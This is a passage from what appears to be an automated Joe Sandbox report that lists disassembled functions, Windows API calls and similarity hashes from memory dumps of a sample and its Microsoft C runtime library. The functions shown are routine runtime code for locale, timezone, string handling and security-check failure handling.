                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __doserrno_errno$_invalid_parameter_invalid_parameter_noinfo_mbspbrk
                                                                                                          • String ID: ./\
                                                                                                          • API String ID: 790986403-3176372042
                                                                                                          • Opcode ID: 15cab3252da7987cd06c3d4db0227fc19e5b9e5cbd557e3a76c2501446918d05
                                                                                                          • Instruction ID: 97e36205c6cd1dc9d299abfc1fffaf98152e334c2b130600d91255a8e755c727
                                                                                                          • Opcode Fuzzy Hash: 15cab3252da7987cd06c3d4db0227fc19e5b9e5cbd557e3a76c2501446918d05
                                                                                                          • Instruction Fuzzy Hash: 06B18572800729EEDBA09F658C48AEAB7BCAF45315F104296F558E7180E735BAC0DF61
                                                                                                          Function 6FD96340 Relevance: 40.8, APIs: 27, Instructions: 271stringtimeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _lock.MSVCR100(00000007,6FD96508,0000002C,6FD96552,6FD96570,00000008,6FD96985), ref: 6FD96362
                                                                                                            • Part of subcall function 6FD80910: EnterCriticalSection.KERNEL32(00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD8092B
                                                                                                          • __tzname.MSVCR100(6FD96508,0000002C,6FD96552,6FD96570,00000008,6FD96985), ref: 6FD9636B
                                                                                                          • _get_timezone.MSVCR100(?,6FD96508,0000002C,6FD96552,6FD96570,00000008,6FD96985), ref: 6FD96377
                                                                                                          • _get_daylight.MSVCR100(6FD96985,6FD96508,0000002C,6FD96552,6FD96570,00000008,6FD96985), ref: 6FD96389
                                                                                                          • _get_dstbias.MSVCR100(00000008,6FD96508,0000002C,6FD96552,6FD96570,00000008,6FD96985), ref: 6FD9639B
                                                                                                          • ___lc_codepage_func.MSVCR100(6FD96508,0000002C,6FD96552,6FD96570,00000008,6FD96985), ref: 6FD963A9
                                                                                                            • Part of subcall function 6FD91D44: strlen.MSVCR100(00000000,?,00007FFF,?,6FD91D0C,?,6FD91D28,00000010), ref: 6FD91D62
                                                                                                            • Part of subcall function 6FD91D44: strlen.MSVCR100(00000000,?,00007FFF,?,6FD91D0C,?,6FD91D28,00000010), ref: 6FD91D71
                                                                                                            • Part of subcall function 6FD91D44: _mbsnbicoll.MSVCR100(00000000,00000000,00000000,?,00007FFF,?,6FD91D0C,?,6FD91D28,00000010), ref: 6FD91D8D
                                                                                                          • GetTimeZoneInformation.KERNEL32(6FE25DE8,6FD96508,0000002C,6FD96552,6FD96570,00000008,6FD96985), ref: 6FD963F0
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,6FE25DEC,00000000,?,0000003F,00000000,?), ref: 6FD9646E
                                                                                                          • WideCharToMultiByte.KERNEL32(000000FF,00000000,6FE25E40,000000FF,?,0000003F,00000000,?), ref: 6FD964A1
                                                                                                          • __timezone.MSVCR100 ref: 6FD964C7
                                                                                                          • __daylight.MSVCR100 ref: 6FD964D1
                                                                                                          • __dstbias.MSVCR100 ref: 6FD964DB
                                                                                                          • strcmp.MSVCR100(00000000,00000000,6FD96508,0000002C,6FD96552,6FD96570,00000008,6FD96985), ref: 6FDA99C9
                                                                                                          • free.MSVCR100(00000000,6FD96508,0000002C,6FD96552,6FD96570,00000008,6FD96985), ref: 6FDA99E2
                                                                                                          • strlen.MSVCR100(00000000,6FD96508,0000002C,6FD96552,6FD96570,00000008,6FD96985), ref: 6FDA99E9
                                                                                                          • _malloc_crt.MSVCR100(00000001,00000000,6FD96508,0000002C,6FD96552,6FD96570,00000008,6FD96985), ref: 6FDA99F0
                                                                                                          • strlen.MSVCR100(00000000,00000000,6FD96508,0000002C,6FD96552,6FD96570,00000008,6FD96985), ref: 6FDA9A06
                                                                                                          • strcpy_s.MSVCR100(00000001,00000000,6FD96508,0000002C,6FD96552,6FD96570,00000008,6FD96985), ref: 6FDA9A14
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FD96508,0000002C,6FD96552,6FD96570,00000008,6FD96985), ref: 6FDA9A29
                                                                                                          • free.MSVCR100(00000000,00000000,00000000,00000000,00000000,00000000,6FD96508,0000002C,6FD96552,6FD96570,00000008,6FD96985), ref: 6FDA9A2F
                                                                                                          • strncpy_s.MSVCR100(?,00000040,00000000,00000003), ref: 6FDA9A4A
                                                                                                          • atol.MSVCR100(-00000003), ref: 6FDA9A67
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: strlen$ByteCharMultiWidefree$CriticalEnterInformationSectionTimeZone___lc_codepage_func__daylight__dstbias__timezone__tzname_get_daylight_get_dstbias_get_timezone_invoke_watson_lock_malloc_crt_mbsnbicollatolstrcmpstrcpy_sstrncpy_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 1088170971-0
                                                                                                          • Opcode ID: 66e6c021e2b40db27424d1ed2eb53753b9813a64080e27fedd3931d279758b01
                                                                                                          • Instruction ID: b5a8967a0bd4e715f2b225e8805b1581ac962e985d6ec4517cbaf337fe0fc214
                                                                                                          • Opcode Fuzzy Hash: 66e6c021e2b40db27424d1ed2eb53753b9813a64080e27fedd3931d279758b01
                                                                                                          • Instruction Fuzzy Hash: 83919272D04345DFDB809FE8C98099DBBF5FF07324B24006BE154AB294EB36B9418B65
                                                                                                          Function 6FD88468 Relevance: 23.3, APIs: 12, Strings: 1, Instructions: 582COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _getptd.MSVCR100(00000083,00000001,000000BC,?,6FD86D5D,?,000000BC,?,00000000,00000000,00000005), ref: 6FD88470
                                                                                                          • GetUserDefaultLCID.KERNEL32(00000083,00000001,000000BC,?,6FD86D5D,?,000000BC,?,00000000,00000000,00000005), ref: 6FD884C4
                                                                                                          • IsValidCodePage.KERNEL32(00000000,?,6FD86D5D,?,000000BC,?,00000000,00000000,00000005), ref: 6FD88516
                                                                                                          • IsValidLocale.KERNEL32(?,00000001,?,6FD86D5D,?,000000BC,?,00000000,00000000,00000005), ref: 6FD88529
                                                                                                          • GetLocaleInfoA.KERNEL32(?,00001001,?,00000040,?,6FD86D5D,?,000000BC,?,00000000,00000000,00000005), ref: 6FD88573
                                                                                                          • GetLocaleInfoA.KERNEL32(?,00001002,?,00000040,00000000,00000000,00000005), ref: 6FD88587
                                                                                                          • _itoa_s.MSVCR100(00000010,?,00000010,0000000A), ref: 6FD88598
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Locale$InfoValid$CodeDefaultPageUser_getptd_itoa_s
                                                                                                          • String ID: Norwegian-Nynorsk
                                                                                                          • API String ID: 2670470560-461349085
                                                                                                          • Opcode ID: 65d2a49df4ea94ab2ba3fa9866d4e3bdae5dc77a24e7f4786eb3ff2e65ebb35b
                                                                                                          • Instruction ID: 2729b3fdb4f7870a65b68fa2c27a18f9e19bf8a159ff61930ff474b179422016
                                                                                                          • Opcode Fuzzy Hash: 65d2a49df4ea94ab2ba3fa9866d4e3bdae5dc77a24e7f4786eb3ff2e65ebb35b
                                                                                                          • Instruction Fuzzy Hash: 4DF145A018DBD16FE7924B704DF5AEA3F68EF03258B0642DBD9E14A493D214F547C3A2
                                                                                                          Function 6FD945AE Relevance: 18.6, Strings: 14, Instructions: 1146COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: [thunk]:$`adjustor{$`local static destructor helper'$`template static data member constructor helper'$`template static data member destructor helper'$`vtordispex{$`vtordisp{$extern "C" $private: $protected: $public: $static $virtual $}'
                                                                                                          • API String ID: 0-3028518216
                                                                                                          • Opcode ID: f1cff235ef437ce65f775c1e64b95a2860533f44d3e66162b80388d6a550f555
                                                                                                          • Instruction ID: 9b9ee4d457afa902f903718453120d8dc17481ef31313fbf96cfba309067f85e
                                                                                                          • Opcode Fuzzy Hash: f1cff235ef437ce65f775c1e64b95a2860533f44d3e66162b80388d6a550f555
                                                                                                          • Instruction Fuzzy Hash: F0826B72E50609DBEB84CBA9C990BED77B9AF49304F04413AE521E72C0EB39F945CB54
                                                                                                          Function 6FD8888A Relevance: 18.2, APIs: 12, Instructions: 160stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000002,?,?,00000000), ref: 6FD8862D
                                                                                                          • free.MSVCR100(?,?,?,00000000), ref: 6FD8864E
                                                                                                          • _calloc_crt.MSVCR100(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6FD8884F
                                                                                                          • strncpy_s.MSVCR100(00000000,00000000,00000000,-00000001), ref: 6FD88869
                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 6FD888D4
                                                                                                          • _calloc_crt.MSVCR100(00000000,00000002,?,?,00000000), ref: 6FD888E3
                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 6FD888FC
                                                                                                          • free.MSVCR100(00000000), ref: 6FDB06D9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoLocale$_calloc_crtfree$strncpy_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 2432546303-0
                                                                                                          • Opcode ID: 6b6db28b64349e33ab1b482b7392df52c450741bd506f4610dbe2bd62cea7ea3
                                                                                                          • Instruction ID: 858b6ae762041721279c9cc0718a90b7285d87d7ea4e6006d2643198dc030021
                                                                                                          • Opcode Fuzzy Hash: 6b6db28b64349e33ab1b482b7392df52c450741bd506f4610dbe2bd62cea7ea3
                                                                                                          • Instruction Fuzzy Hash: 165190B590535AEBEB919F248D46FAE3BB8AF01364F104056E824E6190EB31B960CF60
                                                                                                          Function 6FE00915 Relevance: 14.8, APIs: 3, Strings: 5, Instructions: 761stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000,?,?,00000016), ref: 6FE009ED
                                                                                                            • Part of subcall function 6FDFAF2C: GetCurrentProcess.KERNEL32(C0000417), ref: 6FDFAF42
                                                                                                            • Part of subcall function 6FDFAF2C: TerminateProcess.KERNEL32(00000000), ref: 6FDFAF49
                                                                                                          • strcpy_s.MSVCR100(?,00000016,1#IND,00000000,00000000,00000000,00000000,00000000,?,?,00000016), ref: 6FE00A22
                                                                                                          • strcpy_s.MSVCR100(?,00000016,1#QNAN,?,?,00000016), ref: 6FE00A3F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Processstrcpy_s$CurrentTerminate_invoke_watson
                                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$T
                                                                                                          • API String ID: 3371357731-740461495
                                                                                                          • Opcode ID: b7d3b5948e91c867a01c6c3e91b1a0335cb82f939972d3fe5107535befe2f7fd
                                                                                                          • Instruction ID: eb52fa5a8f3d88789bd16fa4754bd03fba10ea2ed6ef7376ad2bed620034ac71
                                                                                                          • Opcode Fuzzy Hash: b7d3b5948e91c867a01c6c3e91b1a0335cb82f939972d3fe5107535befe2f7fd
                                                                                                          • Instruction Fuzzy Hash: FA528F72D0425A8FDF14DFA8C8403EEBBB1FF44308F60916AD955AB380E7749A52CB91
                                                                                                          Function 6FDF6C74 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 92memorylibraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 6FDF6C9D
                                                                                                          • GetSystemInfo.KERNEL32(?), ref: 6FDF6CB5
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 6FDF6CC5
                                                                                                          • GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 6FDF6CD5
                                                                                                          • VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004), ref: 6FDF6D27
                                                                                                          • VirtualProtect.KERNEL32(?,-00000001,00000104,?), ref: 6FDF6D3C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Virtual$AddressAllocHandleInfoModuleProcProtectQuerySystem
                                                                                                          • String ID: SetThreadStackGuarantee$kernel32.dll
                                                                                                          • API String ID: 3290314748-423161677
                                                                                                          • Opcode ID: c201adc8ef99ad27af87f02f000726601aa7ddced626118b8274370cf24b6647
                                                                                                          • Instruction ID: 4bc631ea80d38264410c7f1c560f995121f9ba10feac0148812010c3c3768866
                                                                                                          • Opcode Fuzzy Hash: c201adc8ef99ad27af87f02f000726601aa7ddced626118b8274370cf24b6647
                                                                                                          • Instruction Fuzzy Hash: 3231A971A01629EBEF50CFA4CC84EEE77B8EB06755B154126E511E7540DB30BA05CBA0
                                                                                                          Function 6FD885AC Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 56stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,00000005,00000002,?,?,6FD884ED,?,6FD86D5D,?,000000BC,?,00000000,00000000,00000005), ref: 6FD885CD
                                                                                                          • strcmp.MSVCR100(00000000,ACP,?,?,6FD884ED,?,6FD86D5D,?,000000BC,?,00000000,00000000,00000005), ref: 6FD928A7
                                                                                                          • strcmp.MSVCR100(00000000,OCP,?,?,6FD884ED,?,6FD86D5D,?,000000BC,?,00000000,00000000,00000005), ref: 6FDB1764
                                                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,00000005,00000002,?,?,6FD884ED,?,6FD86D5D,?,000000BC,?,00000000,00000000,00000005), ref: 6FDB177D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoLocalestrcmp
                                                                                                          • String ID: ACP$OCP
                                                                                                          • API String ID: 3191669094-711371036
                                                                                                          • Opcode ID: 6835b55927810968caca52ddca794a0d89a0208b03d4a0bec118bf87fb16163e
                                                                                                          • Instruction ID: b62762e302259bbc93c1875952c98cd7691cb45a28139e151e86fa0131d9a610
                                                                                                          • Opcode Fuzzy Hash: 6835b55927810968caca52ddca794a0d89a0208b03d4a0bec118bf87fb16163e
                                                                                                          • Instruction Fuzzy Hash: 7D012475508706FAFB918F64DC05F9A77F8AF0136DF20016AE412EA081EF30F6418650
                                                                                                          Function 6FD8A1DD Relevance: 12.2, APIs: 8, Instructions: 225COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • wcsncpy_s.MSVCR100(?,000000FF,?,00000000,?,?,?,?,?,6FD8A184,?,?,?,?,?,?), ref: 6FD8A2D8
                                                                                                          • wcsncpy_s.MSVCR100(?,000000FF,?,?,?,?,?,?,?,6FD8A184,?,?,?,?,?,?), ref: 6FDB126A
                                                                                                          • wcsncpy_s.MSVCR100(?,000000FF,00000000,?,?,?,?,?,?,6FD8A184,?,?,?,?,?,?), ref: 6FDB1293
                                                                                                          • wcsncpy_s.MSVCR100(?,000000FF,?,?,?,?,?,?,?,6FD8A184,?,?,?,?,?,?), ref: 6FDB12B0
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,6FD8A184,?,?,?,?,?,?,?,?,?), ref: 6FDB1319
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,6FD8A184,?,?,?,?,?,?,?,?,?), ref: 6FDB1323
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,6FD8A184,?,?,?,?,?,?,?,?,?), ref: 6FDB1334
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcsncpy_s$_errno$_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2268458229-0
                                                                                                          • Opcode ID: 87b73b51c518bb9edbcaf6508134a0b64f8a69439c1166a22af99ce3c7bbfd33
                                                                                                          • Instruction ID: 1f4caaf5b25244babac0ba6866773eb91dcbeed94f37479bead1d7738214b8b4
                                                                                                          • Opcode Fuzzy Hash: 87b73b51c518bb9edbcaf6508134a0b64f8a69439c1166a22af99ce3c7bbfd33
                                                                                                          • Instruction Fuzzy Hash: EB71F0B1D04316EA9FA88F6988411DA37A2EF96304B65833FE875D61C0F372B981C791
                                                                                                          Function 6FD80807 Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 6FDFC224
                                                                                                          • _crt_debugger_hook.MSVCR100(00000001), ref: 6FDFC231
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6FDFC239
                                                                                                          • UnhandledExceptionFilter.KERNEL32(6FDFC270), ref: 6FDFC244
                                                                                                          • _crt_debugger_hook.MSVCR100(00000001), ref: 6FDFC255
                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 6FDFC260
                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 6FDFC267
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterProcessUnhandled_crt_debugger_hook$CurrentDebuggerPresentTerminate
                                                                                                          • String ID:
                                                                                                          • API String ID: 3369434319-0
                                                                                                          • Opcode ID: 2fcce1ffa3263b8bcc63eaf103f7aca4863ce131c838cb2e1f9458781a99a370
                                                                                                          • Instruction ID: 6f1d191ce8afc7274a18a7d2c1ae9ee9f50f3b9264ddf24b395d5b1c51e48cc8
                                                                                                          • Opcode Fuzzy Hash: 2fcce1ffa3263b8bcc63eaf103f7aca4863ce131c838cb2e1f9458781a99a370
                                                                                                          • Instruction Fuzzy Hash: 7321E9B480AB548FEB90DF28C185A483FB0BB1B320F10551BE4089A740FFB86AA1CF45
                                                                                                          Function 00D017CE Relevance: 10.6, APIs: 7, Instructions: 54COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 00D01889
                                                                                                          • _crt_debugger_hook.MSVCR100(00000001), ref: 00D01896
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D0189E
                                                                                                          • UnhandledExceptionFilter.KERNEL32(00D021E8), ref: 00D018A9
                                                                                                          • _crt_debugger_hook.MSVCR100(00000001), ref: 00D018BA
                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 00D018C5
                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 00D018CC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612452283.0000000000D01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D00000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612359297.0000000000D00000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30612550523.0000000000D02000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30612649247.0000000000D04000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_d00000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterProcessUnhandled_crt_debugger_hook$CurrentDebuggerPresentTerminate
                                                                                                          • String ID:
                                                                                                          • API String ID: 3369434319-0
                                                                                                          • Opcode ID: 839d6dbad7e91cc4d6e097375ead5001a8946239edb14f54a88c14e6e4c8f891
                                                                                                          • Instruction ID: 5fabe3a2756d844493a22567d8c4d4fbc28d93ca527b1b6621e23897ff45a676
                                                                                                          • Opcode Fuzzy Hash: 839d6dbad7e91cc4d6e097375ead5001a8946239edb14f54a88c14e6e4c8f891
                                                                                                          • Instruction Fuzzy Hash: 812138B8912304EBE700DF69E9497547BA8FB1C355F50411AE50CC63A1EBB09A85CB7A
                                                                                                          Function 6FDFC16F Relevance: 10.6, APIs: 7, Instructions: 54COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 6FDFC224
                                                                                                          • _crt_debugger_hook.MSVCR100(00000001), ref: 6FDFC231
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6FDFC239
                                                                                                          • UnhandledExceptionFilter.KERNEL32(6FDFC270), ref: 6FDFC244
                                                                                                          • _crt_debugger_hook.MSVCR100(00000001), ref: 6FDFC255
                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 6FDFC260
                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 6FDFC267
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterProcessUnhandled_crt_debugger_hook$CurrentDebuggerPresentTerminate
                                                                                                          • String ID:
                                                                                                          • API String ID: 3369434319-0
                                                                                                          • Opcode ID: 53408a5741d1ca3ddee0fa9fe21e78be4c8e8472be1df5a508a9a124c3bf06fa
                                                                                                          • Instruction ID: ecf7174650f75e01469be86dc3551beae5dc4ef0689942a56f348c0c1421733a
                                                                                                          • Opcode Fuzzy Hash: 53408a5741d1ca3ddee0fa9fe21e78be4c8e8472be1df5a508a9a124c3bf06fa
                                                                                                          • Instruction Fuzzy Hash: 3921DBB480AB548FEB90DF28C185A483FB0BB1B324F10551BE50896740FFB86AA5CF45
                                                                                                          Function 6FDFADFC Relevance: 9.1, APIs: 6, Instructions: 75COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _crt_debugger_hook.MSVCR100(00000001,00000001,00000000), ref: 6FDFAE1C
                                                                                                          • memset.MSVCR100(?,00000000,0000004C,00000001,00000000), ref: 6FDFAE34
                                                                                                          • IsDebuggerPresent.KERNEL32(?,00000001,00000000), ref: 6FDFAEE0
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00000001,00000000), ref: 6FDFAEEA
                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,00000001,00000000), ref: 6FDFAEF7
                                                                                                          • _crt_debugger_hook.MSVCR100(00000001,?,00000001,00000000), ref: 6FDFAF0B
                                                                                                          Memory Dump Source
